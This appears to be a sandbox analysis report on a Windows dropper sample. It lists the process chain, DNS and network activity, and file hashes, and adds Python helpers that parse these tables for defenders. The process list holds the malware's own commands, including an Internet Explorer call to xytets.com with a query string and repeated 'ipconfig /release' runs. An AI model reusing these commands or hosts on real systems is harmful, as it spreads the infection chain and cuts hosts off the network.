"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"

C:\Temp\dxvpnifaysqkicav.exe

C:\Temp\dxvpnifaysqkicav.exe run

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3468 CREDAT:17410 /prefetch:2

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\kicavpnhfa.exe ups_run

C:\Temp\kicavpnhfa.exe

C:\Temp\kicavpnhfa.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_kicavpnhfa.exe ups_ins

C:\Temp\i_kicavpnhfa.exe

C:\Temp\i_kicavpnhfa.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\kfzxrpkhcz.exe ups_run

C:\Temp\kfzxrpkhcz.exe

C:\Temp\kfzxrpkhcz.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_kfzxrpkhcz.exe ups_ins

C:\Temp\i_kfzxrpkhcz.exe

C:\Temp\i_kfzxrpkhcz.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\zusmkecwup.exe ups_run

C:\Temp\zusmkecwup.exe

C:\Temp\zusmkecwup.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_zusmkecwup.exe ups_ins

C:\Temp\i_zusmkecwup.exe

C:\Temp\i_zusmkecwup.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\zxrpjhczur.exe ups_run

C:\Temp\zxrpjhczur.exe

C:\Temp\zxrpjhczur.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_zxrpjhczur.exe ups_ins

C:\Temp\i_zxrpjhczur.exe

C:\Temp\i_zxrpjhczur.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\trljebwuom.exe ups_run

C:\Temp\trljebwuom.exe

C:\Temp\trljebwuom.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_trljebwuom.exe ups_ins

C:\Temp\i_trljebwuom.exe

C:\Temp\i_trljebwuom.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\ojgbztrljd.exe ups_run

C:\Temp\ojgbztrljd.exe

C:\Temp\ojgbztrljd.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_ojgbztrljd.exe ups_ins

C:\Temp\i_ojgbztrljd.exe

C:\Temp\i_ojgbztrljd.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\oigtqljdbv.exe ups_run

C:\Temp\oigtqljdbv.exe

C:\Temp\oigtqljdbv.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_oigtqljdbv.exe ups_ins

C:\Temp\i_oigtqljdbv.exe

C:\Temp\i_oigtqljdbv.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\fdyvqnigay.exe ups_run

C:\Temp\fdyvqnigay.exe

C:\Temp\fdyvqnigay.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_fdyvqnigay.exe ups_ins

C:\Temp\i_fdyvqnigay.exe

C:\Temp\i_fdyvqnigay.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\axsqkicaus.exe ups_run

C:\Temp\axsqkicaus.exe

C:\Temp\axsqkicaus.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_axsqkicaus.exe ups_ins

C:\Temp\i_axsqkicaus.exe

C:\Temp\i_axsqkicaus.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\usmkfcxvpn.exe ups_run

C:\Temp\usmkfcxvpn.exe

C:\Temp\usmkfcxvpn.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_usmkfcxvpn.exe ups_ins

C:\Temp\i_usmkfcxvpn.exe

C:\Temp\i_usmkfcxvpn.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\zxspkicamk.exe ups_run

C:\Temp\zxspkicamk.exe

C:\Temp\zxspkicamk.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_zxspkicamk.exe ups_ins

C:\Temp\i_zxspkicamk.exe

C:\Temp\i_zxspkicamk.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\xrpjhczusm.exe ups_run

C:\Temp\xrpjhczusm.exe

C:\Temp\xrpjhczusm.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_xrpjhczusm.exe ups_ins

C:\Temp\i_xrpjhczusm.exe

C:\Temp\i_xrpjhczusm.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\uomgezwroj.exe ups_run

C:\Temp\uomgezwroj.exe

C:\Temp\uomgezwroj.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_uomgezwroj.exe ups_ins

C:\Temp\i_uomgezwroj.exe

C:\Temp\i_uomgezwroj.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\rljdbwtomg.exe ups_run

C:\Temp\rljdbwtomg.exe

C:\Temp\rljdbwtomg.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_rljdbwtomg.exe ups_ins

C:\Temp\i_rljdbwtomg.exe

C:\Temp\i_rljdbwtomg.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\wqoigbytql.exe ups_run

C:\Temp\wqoigbytql.exe

C:\Temp\wqoigbytql.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_wqoigbytql.exe ups_ins

C:\Temp\i_wqoigbytql.exe

C:\Temp\i_wqoigbytql.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\tnlfdyvqoi.exe ups_run

C:\Temp\tnlfdyvqoi.exe

C:\Temp\tnlfdyvqoi.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_tnlfdyvqoi.exe ups_ins

C:\Temp\i_tnlfdyvqoi.exe

C:\Temp\i_tnlfdyvqoi.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\qnigaysqki.exe ups_run

C:\Temp\qnigaysqki.exe

C:\Temp\qnigaysqki.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_qnigaysqki.exe ups_ins

C:\Temp\i_qnigaysqki.exe

C:\Temp\i_qnigaysqki.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\qkicausnkf.exe ups_run

C:\Temp\qkicausnkf.exe

C:\Temp\qkicausnkf.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_qkicausnkf.exe ups_ins

C:\Temp\i_qkicausnkf.exe

C:\Temp\i_qkicausnkf.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\upnhfzxspk.exe ups_run

C:\Temp\upnhfzxspk.exe

C:\Temp\upnhfzxspk.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_upnhfzxspk.exe ups_ins

C:\Temp\i_upnhfzxspk.exe

C:\Temp\i_upnhfzxspk.exe ups_ins

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\smkecwupmh.exe ups_run

C:\Temp\smkecwupmh.exe

C:\Temp\smkecwupmh.exe ups_run

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release

C:\windows\system32\ipconfig.exe

C:\windows\system32\ipconfig.exe /release

C:\temp\CreateProcess.exe

C:\temp\CreateProcess.exe C:\Temp\i_smkecwupmh.exe ups_ins

C:\Temp\i_smkecwupmh.exe

C:\Temp\i_smkecwupmh.exe ups_ins
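
The Processes list above is long but highly regular: after the dropper (dxvpnifaysqkicav.exe run) and the browser launch, everything goes through the helper C:\temp\CreateProcess.exe, which starts a randomly named executable with ups_run, then ipconfig.exe /release, then the i_-prefixed copy with ups_ins, and repeats. The parser below is an added example, not part of the report; PROCESS_LIST is an excerpt copied from the section above covering the first two iterations, the function names are mine, and the "ten or more lowercase letters" test for generated file names is a heuristic I chose for this report, not a property the sandbox asserts.

```python
"""Parse the flattened Processes list above (an image path line followed by
its command line) and summarise the dropper's run loop. Added example, not
part of the report; PROCESS_LIST is an excerpt copied from that section."""
import ntpath
import re

PROCESS_LIST = r"""
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_437309d104ca341348f98d56425358fc.exe"
C:\Temp\dxvpnifaysqkicav.exe
C:\Temp\dxvpnifaysqkicav.exe run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\kicavpnhfa.exe ups_run
C:\Temp\kicavpnhfa.exe
C:\Temp\kicavpnhfa.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_kicavpnhfa.exe ups_ins
C:\Temp\i_kicavpnhfa.exe
C:\Temp\i_kicavpnhfa.exe ups_ins
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\kfzxrpkhcz.exe ups_run
C:\Temp\kfzxrpkhcz.exe
C:\Temp\kfzxrpkhcz.exe ups_run
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release
C:\windows\system32\ipconfig.exe
C:\windows\system32\ipconfig.exe /release
C:\temp\CreateProcess.exe
C:\temp\CreateProcess.exe C:\Temp\i_kfzxrpkhcz.exe ups_ins
C:\Temp\i_kfzxrpkhcz.exe
C:\Temp\i_kfzxrpkhcz.exe ups_ins
"""


def parse_process_list(text):
    """Pair each image line with the command line that follows it; the
    report's blank separator lines are ignored."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) % 2:
        raise ValueError("expected image / command-line pairs")
    return list(zip(lines[0::2], lines[1::2]))


def split_cmdline(cmd):
    """Minimal Windows-style split: an optional double-quoted image path,
    then whitespace-separated arguments (none here contain spaces)."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.index('"', 1)
        return [cmd[1:end]] + cmd[end + 1:].split()
    return cmd.split()


def launcher_calls(entries, launcher="createprocess.exe"):
    """(target basename, first argument) for every call made via the helper."""
    calls = []
    for image, cmd in entries:
        if ntpath.basename(image).lower() == launcher:
            argv = split_cmdline(cmd)
            if len(argv) >= 3:
                calls.append((ntpath.basename(argv[1]), argv[2]))
    return calls


def find_cycles(calls):
    """Group launcher calls into the triplets the report repeats:
    X.exe ups_run, ipconfig.exe /release, i_X.exe ups_ins."""
    cycles, i = [], 0
    while i + 2 < len(calls):
        (t1, a1), (t2, a2), (t3, a3) = calls[i:i + 3]
        if (a1 == "ups_run" and (t2.lower(), a2) == ("ipconfig.exe", "/release")
                and a3 == "ups_ins" and t3 == "i_" + t1):
            cycles.append((t1, t3))
            i += 3
        else:
            i += 1
    return cycles


def release_count(calls):
    """How many times the DHCP lease was released through the helper."""
    return sum(1 for t, a in calls if t.lower() == "ipconfig.exe" and a == "/release")


GENERATED_STEM = re.compile(r"[a-z]{10,}")   # heuristic, chosen for this report


def generated_names(entries):
    """Image names whose stem (minus an i_ prefix) is ten or more lowercase letters."""
    found = set()
    for image, _ in entries:
        base = ntpath.basename(image)
        stem = ntpath.splitext(base)[0]
        stem = stem[2:] if stem.startswith("i_") else stem
        if GENERATED_STEM.fullmatch(stem):
            found.add(base)
    return sorted(found)
```

Fed the whole section, find_cycles returns twenty (X.exe, i_X.exe) pairs, one per SeDebugPrivilege row in the AdjustPrivilegeToken table, and release_count is twenty as well: every iteration drops the VM's DHCP lease with ipconfig /release before the i_ copy runs with ups_ins.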

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 182.129.81.91.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 7.98.51.23.in-addr.arpa udp
US 8.8.8.8:53 xytets.com udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 xytets.com udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 175.21.199.152.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 73.144.22.2.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp
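
Most rows in the Network table are not forward lookups but PTR queries: an in-addr.arpa name carries the address being looked up with its octets reversed, so 200.197.79.204.in-addr.arpa is the reverse lookup of 204.79.197.200, the ieonline.microsoft.com endpoint on the tcp row. The helper below is an added example, not part of the report; it parses an excerpt copied from the table (including the final row whose Domain cell is empty), recovers the addresses behind the PTR names, and matches them against the direct connections. It also handles ip6.arpa names, which this page does not contain; the IPv6 name used in the check is the example from RFC 3596, not sandbox data. Function names are mine.

```python
"""Decode the Network table above: turn in-addr.arpa / ip6.arpa names back
into the addresses they refer to and separate them from forward lookups and
direct connections. Added example, not part of the report; NETWORK_TABLE is
an excerpt copied from the table."""
import ipaddress

NETWORK_TABLE = """\
Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 xytets.com udp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 udp
"""


def reverse_ptr(name):
    """Address behind a PTR owner name, or None if the name is not one."""
    labels = name.rstrip(".").lower().split(".")
    if labels[-2:] == ["in-addr", "arpa"] and len(labels) == 6:
        return str(ipaddress.IPv4Address(".".join(reversed(labels[:4]))))
    if labels[-2:] == ["ip6", "arpa"] and len(labels) == 34:
        nibbles = "".join(reversed(labels[:32]))
        groups = [nibbles[i:i + 4] for i in range(0, 32, 4)]
        return ipaddress.IPv6Address(":".join(groups)).compressed
    return None


def parse_network_table(text):
    """Rows as dicts; a three-field row is one whose Domain cell is empty."""
    rows = []
    for line in text.splitlines()[1:]:          # skip the header
        parts = line.split()
        if len(parts) == 4:
            country, dest, domain, proto = parts
        elif len(parts) == 3:
            (country, dest, proto), domain = parts, ""
        else:
            continue
        host, _, port = dest.rpartition(":")
        rows.append({"country": country, "ip": host, "port": int(port),
                     "domain": domain, "proto": proto})
    return rows


def classify(rows):
    """Split rows into reverse lookups (as the addresses asked about),
    forward lookups, and non-DNS connections."""
    reverse, forward, connections = [], set(), set()
    for r in rows:
        if r["port"] == 53 and r["proto"] == "udp":
            ip = reverse_ptr(r["domain"]) if r["domain"] else None
            if ip:
                reverse.append(ip)
            elif r["domain"]:
                forward.add(r["domain"])
        else:
            connections.add((r["ip"], r["port"], r["domain"]))
    return reverse, forward, connections


def ptr_for_connections(reverse, connections):
    """Addresses that were both connected to and reverse-resolved."""
    connected = {ip for ip, _, _ in connections}
    return sorted(set(reverse) & connected)


if __name__ == "__main__":
    rev, fwd, conns = classify(parse_network_table(NETWORK_TABLE))
    print("reverse lookups:", rev)
    print("forward lookups:", sorted(fwd))
    print("connections:", sorted(conns))
    print("connected and reverse-resolved:", ptr_for_connections(rev, conns))
```

On the full table the only forward lookup is xytets.com (the host the dropper hands to iexplore.exe), and the PTR queries cover a dozen addresses the report never shows a connection to, so the recovered IP list is the part worth feeding into an IOC or reputation check rather than the .arpa names themselves.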

Files

C:\Temp\dxvpnifaysqkicav.exe

MD5 44def011da7bae1dae45f92e128fa85f
SHA1 76d04f9856441bed55e1811270db0baa6ef02ff3
SHA256 de5acecc1da4f49fd7f63018c91cfacb38d125d83d5a2ef7faefecbcb65fca86
SHA512 6086342f564d3ba422c88858642beacf61040f0b1afd75d3377bcfd7a24bdc3c7ca499a265c5feeda14180a6380be8141d7e5a07d2db2a3a334040dff661db54

C:\Temp\CreateProcess.exe

MD5 e055efecfbdc7954ce003c795f5ed9c1
SHA1 c79876cf3c73987494e466d2b248d114fb1003af
SHA256 cb2a34c2ddc6ccd8a96f9fbea6519d0c96d35b6f55d88fb627fd3f4c03ffb14d
SHA512 1a1b2a5eefc2feebb316cb28fde689c44dd05651bcd5597dc4a693402c7c804fd8b42ed8d06fa604bde20ed8dca79ad6cc15d1f876de027474842da1b66c3c86

C:\Temp\kicavpnhfa.exe

MD5 530796522950afebfdc8f2bdbb279e49
SHA1 f9fd78a75543bce2d17fe1575b58b2c914ed44a4
SHA256 9a41e3958ccc92deeb851a33f8a32162ed709223243b1f29b0a9c67fb08cf2a9
SHA512 9b86ed072aa023ab851e9a0bf86777d1f41afe485a4b1a50a54513566578afff62697eeb1cf8d40599b63eebcf1ff121fa0c6ea0561b32e13b7bb247b7362956

C:\Temp\i_kicavpnhfa.exe

MD5 b16e64309bc17abb42371096ef067195
SHA1 de243f1013861c96c2a4a2141e56b8e5659496f3
SHA256 e1efc058c0b97b1d51a639151e67d0603c201418eeef78d91dbfe304562d96ca
SHA512 0339d41682609d623d95b80423a8b056869b5dbbad1cdca09537b370404dcd6855b0b2ce5e0058a979088b0b04fbb0cb3a205755a7a7d443820c4f4ab6f7f53f

C:\Temp\kfzxrpkhcz.exe

MD5 d09cdde38b767563387ba2dba4187488
SHA1 04457550875c9c8e04b93804374a7ba702382d59
SHA256 1d8f9c461d6cb9e71d366568390aa016ba7d39cb6a2535318dada169c8e144ed
SHA512 d600c363e20a8e43f447acd709d549887858ca9284de1a9e8266ee49c19bbcdc8e06c0344a652f59068eec992df3fd973556ff77602e07736b2ac2b31d72dabb

C:\Temp\i_kfzxrpkhcz.exe

MD5 835e6cb6983dbf37f721455f5fe7e987
SHA1 17f98fdf22d4e43e3cb0069940053bcb365dc6b5
SHA256 453ff54fec9acb757ddb4370300a61eae80238f01d8757908e9c0c09a7aa9992
SHA512 be1ce2152fb1a3bac77093ad0866a317082af493d6cf02c02846e06ee3d5949ac55b68bfd37a742e4b68e124602af2238d5471d93909ebe7bc2ae37ebb8ba214

C:\Temp\zusmkecwup.exe

MD5 9739d6217c3d16edda951e570c7fe103
SHA1 b6d8afb168b8d7e5d0f9f962df9e77677a0a7286
SHA256 5070fa3741cf35c73d55a5afba7b28c460234d7a1a44791db098e4f29fdf832d
SHA512 ae9caa342dd819f96c249a3a4e2d3b233d2f2c853a28c0591eac2b8310f55083bbec5a53d218b104cd4a59d970545ff63e1e70ba41c80ccc9b517b828797d12c

C:\Temp\i_zusmkecwup.exe

MD5 7754ca99a9614c62b630fe050626ba48
SHA1 d9f4d3079a9ce932b0acb9aef1eed2dab8f41f49
SHA256 1fef18d0139349b965aec7716b6732107c212a7c8670a866e0049a30d03aa8ec
SHA512 673c91a3f2703d59f9bb86061bd9690eda986cb8d2f81840af0531b0830e187ae22542b5ecb1d78d9bb24505438b58420cd857e6fd8e142090db765165d54a7f

C:\Temp\zxrpjhczur.exe

MD5 91970ad64ee323f5b95af40f413922ec
SHA1 6d09bf0d515ea78842b6febefc4c979ca544e77f
SHA256 07b79cd1c24e41c6f24795162d7e5656d46d9663fed13fa57bf8d4e24d986b8f
SHA512 aa82136a12cd01e84d527e4d48d49e4658f99da4fd8012066533058dd1477e33f771715231e7166e9ac62536e589f98d770b952005326c09c586f743afb72c7d

C:\Temp\i_zxrpjhczur.exe

MD5 36ed5c47843368dcc32845f3f11f6e06
SHA1 4498e5419bc9521fd1ddc06900926612352c901f
SHA256 36b5dbcf7f3ba7663124749e61af020dc9721b4353a252b8b0c6c1c886cee444
SHA512 ade4a67e2c23abf7f291584f8f585ce7f371279a9a22ba3790541ff1b42000f0053d6628fac563c2ef53ae7e5dfd0294d9d6817741a65a69853679dbd6e53b08

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5 65ff4e1a660b03c192195dc09416d8a8
SHA1 c8e9c1b5d0e74e2f581eaa06d77db42ddb2b24b9
SHA256 25f890730498e80c6b85f0ca869917f45af6cadbb427695a615181eac3285dc2
SHA512 3efa3c79d74861659b4e6e97b362fb4943eeae2e81425029bbf407fb2c4c914bc2d2b43bc8164e9ed050cdb24f411a8582e086eb3557227ad79ec2256c5a52ba

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776

MD5 bd4fd3d4277e6b560fe9824b76237114
SHA1 dc1f3500398cff1040cef8e053aa76b33c33da15
SHA256 ffec78fd67cf61e5dd5a2735d04c423e700f6ab348ca789d36a2734aa99a6636
SHA512 ffb5a07b2601eda753284322519b85aca75d6f820e69152cffaba775dac5336254919ea05a4dc118859e4b1ad83e10942c2a588028c4c1151f587d0603bf76ce

C:\Temp\trljebwuom.exe

MD5 63552f86aa0ac58f737c21a1b2453e35
SHA1 77c7836e1df23fa5b0f75db957a22c46bf7f2b0f
SHA256 500f4eccdd7555c2f8d07e04a6ba4825ccee89414ac9f9c65fd0f58a1b9cb55b
SHA512 9258abb36c26d8d2eb6e2f2e1515400a0c92cbb0ff41d8dfe6586d105c6e5689933f6f67e2f74f334f57a66d5d20041a9cd3170ac90e1ff737bbaf47f34dfda5

C:\Temp\i_trljebwuom.exe

MD5 be8784cd03175a75202a939c18f97a21
SHA1 476904db3d427225d0ebd6aeb4b98d69a8f31e14
SHA256 45d8169b998290b9b6eebf682b25c2687874983a7304b35bde76687b21ae8a0f
SHA512 65c375f52b984a516700b51360d8be307bc04f77a18180a13fadbe1c92c94f9fbbaf9cf1f9c73c3c756be304ac2ea19f94db7d0f4e2ad09ad20721b642093d19

C:\Temp\ojgbztrljd.exe

MD5 999f6444aa8fe09d220bfdc1fe513f22
SHA1 ad04fb5096ea2a5d642b2d395e7bbbe16b6010d6
SHA256 b29267dcad1c23d32bb4e5265e9cd168de9227078f699e7d3048ac23064800a8
SHA512 2fde865bc28ce683c688fa863413d0f51fc3142c8080ec4bcdca12c2fa2ce376309f393d96f267fac54e7e0c870eec26bd0d7c5bad76a80c104570f294a48dae

C:\Temp\i_ojgbztrljd.exe

MD5 c8f9438ea7b2f682190840e9594715ee
SHA1 f9f06b3a74e473a50dc837ff16d12b4f63c1e0bd
SHA256 a1cfac4ae8324d561c13bf04c25c1bdae171ff13260427f95961b8e7c8404305
SHA512 c5ebaaa78a44107b1e5eb7d1b22d45913ccf2d8aa9fad14ee85f46a844d61aba452efc9d7d6e7e5d5e548765b06736ca95caa1cef548636f8b7590445c64ee21

C:\Temp\oigtqljdbv.exe

MD5 42d32ef19a5c561546319de1e7708be2
SHA1 bc36567b8bdf0c02f0668b19fb5c2000f4d1961e
SHA256 9abe1a4dae12b1dd0f33678d0fa41a1964d411fe7adefa0433ab1aa2c84d52b2
SHA512 e8f358cd9b43afcd0a4308f14af70e94da11b1fb1cf3a10097a00b15a9508e3bd4747c9f205175ea38e48218614a49a33678dd585243368560813b650e7efffc

C:\Temp\i_oigtqljdbv.exe

MD5 0c996175f2139bf4482dfd083f1f6a1f
SHA1 20aa3cd0121b2ab6268733a3fad07c9c392536a1
SHA256 f5312915557ea3a872cccf5c2ee41eb4060cfd4565b8011621338812e1b6d231
SHA512 b118bdc6d9adbe67f3fd9424cc2e81ba98e9ab15fc61b5c492eea90661376da1f3969f7503fff71a4a3d480f686fcfc076ddc79998ca97b93e3dab63b8c3a0dc

C:\Temp\fdyvqnigay.exe

MD5 58465a3829aacecb339116e0ca18231a
SHA1 59550dd82da6c132796a4db4cf2e6997c6abb6fe
SHA256 8f45c652ccd9be314e94f00438d5fd6fe1c58814b4bc614072148ccbc3b6bcaa
SHA512 fd44f38774d2f3ee52f1a749e68bbcf958d8615cd7922e9e83e8aefdcfb1605b6226bdb9bea970e37415b8090f74c9392ead45de889d5f1d9bcac5d843afb5f5

C:\Temp\i_fdyvqnigay.exe

MD5 aa761150fbda80ffdd70eea31ab8cc1b
SHA1 468ac6f41fe96a7de0148f44cc6ff659cd57ec60
SHA256 7f10660512d634b73f5852f1b42d99b4a56cc6d37cd0c2af1eb34e4462577a91
SHA512 b2ee4ecca02c7252f5ff4ecea84dda93f9bfbfe2146d255b7493793c51aa2334b55f4e4c90eafd0c866d79969dad752969955c61c00b9f156c45690daf93ce75

C:\Temp\axsqkicaus.exe

MD5 5963e1a593218ede50f6b7462c712cb3
SHA1 fbc1c43c413fa06edce2f068df8ece8f343936ab
SHA256 529d16f04eeb74c7d2d6b83b3554b991067be82e644062f0cdca2b20c3d86f05
SHA512 ce981fe0fd6e3a3bf358543b55a67e0550e0d88df7f28a6dc6609a190ec246b1ac7ed6f593ebf5fa188b884b7c90b6722921ff3a624e466d5576d518e8e84f03

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\EFY08QA2\suggestions[1].en-US

MD5 5a34cb996293fde2cb7a4ac89587393a
SHA1 3c96c993500690d1a77873cd62bc639b3a10653f
SHA256 c6a5377cbc07eece33790cfc70572e12c7a48ad8296be25c0cc805a1f384dbad
